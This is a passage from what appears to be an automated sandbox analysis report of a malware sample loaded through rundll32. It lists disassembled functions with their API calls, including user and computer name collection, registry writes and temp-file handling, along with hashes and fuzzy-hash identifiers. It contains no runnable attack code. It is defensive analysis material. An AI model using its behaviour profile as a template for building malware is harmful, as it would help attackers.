                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055761CF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05576201
                                                            • Part of subcall function 055761CF: HeapFree.KERNEL32(00000000,00000000,?,?,05588D21,?,00000022,?,?,?,?,?,?,?,?,?), ref: 05576226
                                                            • Part of subcall function 05578568: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0557DBAC,?,?,?,?,?,00000022,00000000,00000000), ref: 055785A4
                                                            • Part of subcall function 05578568: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,0557DBAC,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 055785F7
                                                          • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0557DBE1
                                                          • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0557DBE9
                                                          • lstrlen.KERNEL32(?), ref: 0557DBF3
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0557DC08
                                                          • wsprintfA.USER32 ref: 0557DC44
                                                          • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0557DC63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557DC78
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557DC85
                                                          • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0557DC93
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                                          • String ID:
                                                          • API String ID: 168057987-0
                                                          • Opcode ID: 25f9de0918125e74197f2ddff2bdb7571421408418371365aa039856044224f5
                                                          • Instruction ID: 7ae5ab3d0f6de3ad4ef4b330b4d519a3628905d1548c1ab432af38a552bc71fd
                                                          • Opcode Fuzzy Hash: 25f9de0918125e74197f2ddff2bdb7571421408418371365aa039856044224f5
                                                          • Instruction Fuzzy Hash: 1131D03160431AAFDB21AF65EC49E5FBFE8FF84350F01092AF544A2191DB748818DBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558C45A, Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,05593D7C), ref: 0558C49B
                                                          • GetLastError.KERNEL32 ref: 0558C4A5
                                                          • WaitForSingleObject.KERNEL32(000000C8), ref: 0558C4CA
                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 0558C4EB
                                                          • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 0558C513
                                                          • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 0558C528
                                                          • SetEndOfFile.KERNEL32(00000006), ref: 0558C535
                                                          • GetLastError.KERNEL32 ref: 0558C541
                                                          • CloseHandle.KERNEL32(00000006), ref: 0558C54D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                                          • String ID:
                                                          • API String ID: 2864405449-0
                                                          • Opcode ID: 056b373505480f1d8ea422aa66c7cc13c64b359d981935d305be647c6b2a48b7
                                                          • Instruction ID: 903952c7d4df8987ff39d44b1b4a12ae7fbd1bc248efd9598d85d7825daca0e1
                                                          • Opcode Fuzzy Hash: 056b373505480f1d8ea422aa66c7cc13c64b359d981935d305be647c6b2a48b7
                                                          • Instruction Fuzzy Hash: A6318C70910209ABDF109FA4DD4ABBE7FB9FB04316F108156F911FA1A0C7788E58AB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05590AD3, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,0558A266,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000000), ref: 05590AF2
                                                          • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 05590B26
                                                          • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 05590B2E
                                                          • GetLastError.KERNEL32 ref: 05590B38
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 05590B54
                                                          • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 05590B6D
                                                          • CancelIo.KERNEL32(?), ref: 05590B82
                                                          • CloseHandle.KERNEL32(?), ref: 05590B92
                                                          • GetLastError.KERNEL32 ref: 05590B9A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                                          • String ID:
                                                          • API String ID: 4263211335-0
                                                          • Opcode ID: 0d20ec98fd3eeae376fef02887517bafd2e6c8f28b889c10c273e29258eba6ac
                                                          • Instruction ID: 0f079627102ed675136ed7f4a38c5c211ead08a7c208a366a0ca06985efc55a9
                                                          • Opcode Fuzzy Hash: 0d20ec98fd3eeae376fef02887517bafd2e6c8f28b889c10c273e29258eba6ac
                                                          • Instruction Fuzzy Hash: 8F217F36911118FFCF009FA8D889CEE7F7AFB44355F018822F916D21A1DB389648DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557D520, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0557D52C
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0557D542
                                                          • _snwprintf.NTDLL ref: 0557D567
                                                          • CreateFileMappingW.KERNEL32(000000FF,0559C1A8,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 0557D583
                                                          • GetLastError.KERNEL32 ref: 0557D595
                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0557D5AC
                                                          • CloseHandle.KERNEL32(00000000), ref: 0557D5CD
                                                          • GetLastError.KERNEL32 ref: 0557D5D5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 755cb885ef00d0a0899fe9cdea4e5ef936b7e3921d78ac5eda9900b25c157aa4
                                                          • Instruction ID: 39b967f48581ebd5a42f5eabed67ad2d75705ccdd9aafbbb02aecd4d6b7d1761
                                                          • Opcode Fuzzy Hash: 755cb885ef00d0a0899fe9cdea4e5ef936b7e3921d78ac5eda9900b25c157aa4
                                                          • Instruction Fuzzy Hash: C121E772601218BBDB11DF54DC46F9D7BB9BF84754F154022F606E71C0DE74A6089B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05576822, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(00000000,?,059B99A0,?,?,059B99A0,?,?,059B99A0,?,?,059B99A0,?), ref: 05576920
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 05576943
                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 0557694B
                                                          • lstrlenW.KERNEL32(00000000,?,059B99A0,?,?,059B99A0,?,?,059B99A0,?,?,059B99A0,?,?,059B99A0,?), ref: 05576996
                                                          • memcpy.NTDLL(00000000,?,?,?), ref: 055769FE
                                                          • LocalFree.KERNEL32(?,?), ref: 05576A15
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                                          • String ID: P
                                                          • API String ID: 3649579052-3110715001
                                                          • Opcode ID: f8687f4acd7040fa5057f5302c6f7aeab7a958074309188cd278c087b64b83f8
                                                          • Instruction ID: 869803f3844e3875e74699ce625c1fbc32faa9c5205d18fa84aa1d0c2f879d07
                                                          • Opcode Fuzzy Hash: f8687f4acd7040fa5057f5302c6f7aeab7a958074309188cd278c087b64b83f8
                                                          • Instruction Fuzzy Hash: 7B616B71A1060EEFDF10EFA5EC89DAE7BBDFF44304B158026F505A7211DB3999099BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558A442, Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055783D0: RegCreateKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783E5
                                                            • Part of subcall function 055783D0: lstrlen.KERNEL32(059BA7F0,00000000,00000000,0559B072,?,?,?,05581876,00000001,00000000,059BB184), ref: 0557840E
                                                          • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0558A487
                                                          • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0558A49F
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A501
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0558A515
                                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A567
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A590
                                                          • HeapFree.KERNEL32(00000000,05572EFF,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A5A0
                                                          • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A5A9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                                          • String ID:
                                                          • API String ID: 3503961013-0
                                                          • Opcode ID: c9435945715bf596dc84932bc65ebc2074cb1be61ab23658756d28024a4e61ec
                                                          • Instruction ID: 02f5bb9de285e60208b3a1d39546cb3fdf33c792f8d5ebd3c6deeea74ebad061
                                                          • Opcode Fuzzy Hash: c9435945715bf596dc84932bc65ebc2074cb1be61ab23658756d28024a4e61ec
                                                          • Instruction Fuzzy Hash: 7841D5B1D0010AEFDF119F95DD858FEBFBAFB08264F11846AE511B2210D7359A98EF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05585FBD, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,05572BA1), ref: 05585FD3
                                                          • wsprintfA.USER32 ref: 05585FFB
                                                          • lstrlen.KERNEL32(?), ref: 0558600A
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          • wsprintfA.USER32 ref: 0558604A
                                                          • wsprintfA.USER32 ref: 0558607F
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0558608C
                                                          • memcpy.NTDLL(00000008,055963D8,00000002,00000000,?,?), ref: 055860A1
                                                          • wsprintfA.USER32 ref: 055860C4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                                          • String ID:
                                                          • API String ID: 2937943280-0
                                                          • Opcode ID: be367d5b8af7ad8dbcf2a877323ce8ca5f24b04616172718ac89ecdf8d353c92
                                                          • Instruction ID: a8315fdb03d627781571cc79c58f58bddb6872d643fd654802162b038d468cf9
                                                          • Opcode Fuzzy Hash: be367d5b8af7ad8dbcf2a877323ce8ca5f24b04616172718ac89ecdf8d353c92
                                                          • Instruction Fuzzy Hash: 7D413E71A0020AEFCB10EFA9D885EAAB7FCFF48308B154455F519E7211EB35EA05DB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558C132, Relevance: 12.1, APIs: 8, Instructions: 109memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,055818B5), ref: 0558C169
                                                          • RtlAllocateHeap.NTDLL(00000000,055818B5), ref: 0558C180
                                                          • GetUserNameW.ADVAPI32(00000000,055818B5), ref: 0558C18D
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,055818B5,?,05591CC9,059BB184,74ECC740,00000000,05581A7A), ref: 0558C1B3
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0558C1DA
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0558C1EE
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0558C1FB
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0558C21E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: 71f9c3a1c6cf03dcfb46a231331dba87b9b2ef4bbbff948cd399928dc144ee34
                                                          • Instruction ID: 5e50ef1b9b7731c67178442186ee9ed79b26d8b502ef2e3620788e8c6c67c374
                                                          • Opcode Fuzzy Hash: 71f9c3a1c6cf03dcfb46a231331dba87b9b2ef4bbbff948cd399928dc144ee34
                                                          • Instruction Fuzzy Hash: 78313272A14205EFEB10DFA5DCC5A7EBBF9FB44210F12846AE445E7240EB34ED449B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055765DC, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 05576600
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05576612
                                                          • wcstombs.NTDLL ref: 05576620
                                                          • lstrlen.KERNEL32(00000000), ref: 05576644
                                                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 05576659
                                                          • mbstowcs.NTDLL ref: 05576666
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05576678
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05576692
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                                          • String ID:
                                                          • API String ID: 316328430-0
                                                          • Opcode ID: 44bd1bc74b86dec1dc8f5280e9fe8c24402a4ca2e4d8cf25844edce1a742ba98
                                                          • Instruction ID: 20ce03dd7e38c7dc5900b539865957aac1c90e6764c07664616f01504614d4a5
                                                          • Opcode Fuzzy Hash: 44bd1bc74b86dec1dc8f5280e9fe8c24402a4ca2e4d8cf25844edce1a742ba98
                                                          • Instruction Fuzzy Hash: 6F218B3190020AFFDF109FA1EC4AE9E7FB9FB44354F11412AF505A2060EB359968EF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558C6A6, Relevance: 12.1, APIs: 8, Instructions: 57registrymemorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(05576398,00000000,00000000,0559C340,?,?,0558ED61,05576398,00000000,05576398,0559C320), ref: 0558C6B9
                                                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0558C6C7
                                                          • wsprintfA.USER32 ref: 0558C6E3
                                                          • RegCreateKeyA.ADVAPI32(80000001,0559C320,00000000), ref: 0558C6FB
                                                          • lstrlen.KERNEL32(?), ref: 0558C70A
                                                          • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 0558C718
                                                          • RegCloseKey.ADVAPI32(?), ref: 0558C723
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0558C732
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1575615994-0
                                                          • Opcode ID: 20edac26da1ebc1360af95edda6342cb26afb15ceed48393153d872083781dc6
                                                          • Instruction ID: 942686dedd1154f4434d4a02f069094c79f8972fd16985ba0f3c89b81baa77a1
                                                          • Opcode Fuzzy Hash: 20edac26da1ebc1360af95edda6342cb26afb15ceed48393153d872083781dc6
                                                          • Instruction Fuzzy Hash: 3C11AD36110108FFEB015B95EC8AEAA3F7EFB48724F024026FA05D6160DF769D58EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558C55D, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0558C569
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0558C587
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0558C58F
                                                          • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0558C5AD
                                                          • GetLastError.KERNEL32 ref: 0558C5C1
                                                          • RegCloseKey.ADVAPI32(?), ref: 0558C5CC
                                                          • CloseHandle.KERNEL32(00000000), ref: 0558C5D3
                                                          • GetLastError.KERNEL32 ref: 0558C5DB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                                          • String ID:
                                                          • API String ID: 3822162776-0
                                                          • Opcode ID: 77e16c26afb6b9f71491e08b8822e404b4a567a85a793e5f4e45b5ae69c5d0c7
                                                          • Instruction ID: 6b9c6656726792e32e3ea9b76155d722dba0b852c88e37f11a980e0fa8b76c31
                                                          • Opcode Fuzzy Hash: 77e16c26afb6b9f71491e08b8822e404b4a567a85a793e5f4e45b5ae69c5d0c7
                                                          • Instruction Fuzzy Hash: 35112A76104209EFEB119F60E849E7A3F6AFB48391F018022FA06D9240DF359D18AA70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05577539, Relevance: 11.5, APIs: 9, Instructions: 269COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: c2074d44e07bff4e795ece6d1c1021914bdcba9d5d57c5958508a7be023b474e
                                                          • Instruction ID: 9b13112e415be159d826b9c108a6b7b1ce0c88a2fba7fcfe02197568463e23cc
                                                          • Opcode Fuzzy Hash: c2074d44e07bff4e795ece6d1c1021914bdcba9d5d57c5958508a7be023b474e
                                                          • Instruction Fuzzy Hash: 46A10571D2020EEFDF229FA5EC48ABEBBBAFF49314F104465E411A2160D7319A95EF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557984C, Relevance: 10.6, APIs: 7, Instructions: 137memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 05579877
                                                          • StrTrimA.SHLWAPI(00000000,?), ref: 05579894
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 055798C7
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 055798F2
                                                          • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 055799B4
                                                            • Part of subcall function 05586403: lstrlen.KERNEL32(0559B072,059BB184,0559B072,00000000,05591D0C), ref: 0558640C
                                                            • Part of subcall function 05586403: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0558642F
                                                            • Part of subcall function 05586403: memset.NTDLL ref: 0558643E
                                                          • lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 05579965
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 05579994
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                                          • String ID:
                                                          • API String ID: 239510280-0
                                                          • Opcode ID: 76fcc9db1833d418c0ef697b6c3c6b3457affc8ff022b7c1eca80791009ee900
                                                          • Instruction ID: 5a77410603752cdd026e8c44c8ec895edadb500371a6cae65e6a3dcb5925504a
                                                          • Opcode Fuzzy Hash: 76fcc9db1833d418c0ef697b6c3c6b3457affc8ff022b7c1eca80791009ee900
                                                          • Instruction Fuzzy Hash: 5E41E23161420AFFEB129B64EC4AFAE7FB9FB84750F150026F505A6180DF798A44EB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055740E8, Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,?,?), ref: 05574141
                                                          • lstrlen.KERNEL32(?,?,?), ref: 0557415F
                                                          • RtlAllocateHeap.NTDLL(00000000,75146985,?), ref: 05574188
                                                          • memcpy.NTDLL(00000000,00000000,00000000), ref: 0557419F
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 055741B2
                                                          • memcpy.NTDLL(00000000,?,?), ref: 055741C1
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 05574225
                                                            • Part of subcall function 05580043: RtlLeaveCriticalSection.NTDLL(0559C140), ref: 055800C0
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                                          • String ID:
                                                          • API String ID: 1635816815-0
                                                          • Opcode ID: 5ac675c309f7ae6a01a1ff7f3a8fcf71cb0a3b8394ee9ad5a8aee62f72632e04
                                                          • Instruction ID: c83d006553fcc02cab67f2aa0bb19f91519b5fcff47280876891480bce02a48a
                                                          • Opcode Fuzzy Hash: 5ac675c309f7ae6a01a1ff7f3a8fcf71cb0a3b8394ee9ad5a8aee62f72632e04
                                                          • Instruction Fuzzy Hash: 0E418C31A0021DEFDF22AFA5EC89AAE7FA5FF04350F014465F806A6260D7759A54DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055732A8, Relevance: 10.6, APIs: 7, Instructions: 123registrymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlImageNtHeader.NTDLL ref: 055732D1
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05573314
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0557332F
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 05573385
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 055733E0
                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 055733EE
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 055733F9
                                                            • Part of subcall function 0557E8A2: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0557E8B6
                                                            • Part of subcall function 0557E8A2: memcpy.NTDLL(00000000,?,00000000,00000000,00000000,?,055761AF,00000000,00000000,00000001,?,0557D44F,00000020,00000000,?,00000000), ref: 0557E8DF
                                                            • Part of subcall function 0557E8A2: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 0557E908
                                                            • Part of subcall function 0557E8A2: RegCloseKey.ADVAPI32(00000000,?,055761AF,00000000,00000000,00000001,?,0557D44F,00000020,00000000,?,00000000,?,00000000,00000000), ref: 0557E933
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                                                          • String ID:
                                                          • API String ID: 3181710096-0
                                                          • Opcode ID: ae0a7c06122cb44a9e0995f02e33d89e40e6c9a3eb99d38193a36436d0f817a6
                                                          • Instruction ID: 9fb8f8c36c532e9077b9b593d17d7c109b9a94a41f4e8789c96b5b8bba7c465a
                                                          • Opcode Fuzzy Hash: ae0a7c06122cb44a9e0995f02e33d89e40e6c9a3eb99d38193a36436d0f817a6
                                                          • Instruction Fuzzy Hash: 1F41A372614209EFDB219F69EC8AF6A3BA9FB40361F060825F902D6150DF35D949FB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05583EA3, Relevance: 10.6, APIs: 7, Instructions: 111memoryfilestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0559C00C), ref: 05583EB5
                                                          • lstrcpy.KERNEL32(00000000), ref: 05583EF1
                                                            • Part of subcall function 0558F274: lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,0558974F,00000000,00000000,00000000,05593D7C,00000000,00000000,00000006), ref: 0558F283
                                                            • Part of subcall function 0558F274: mbstowcs.NTDLL ref: 0558F29F
                                                          • GetLastError.KERNEL32(00000000), ref: 05583F80
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05583F97
                                                          • InterlockedDecrement.KERNEL32(0559C00C), ref: 05583FAE
                                                          • DeleteFileA.KERNEL32(00000000), ref: 05583FCF
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05583FDF
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                                                          • String ID:
                                                          • API String ID: 908044853-0
                                                          • Opcode ID: dece8f0c3aed061c788cd055be7266738e4e499b1c6321b35e8c088ee1fe3dd0
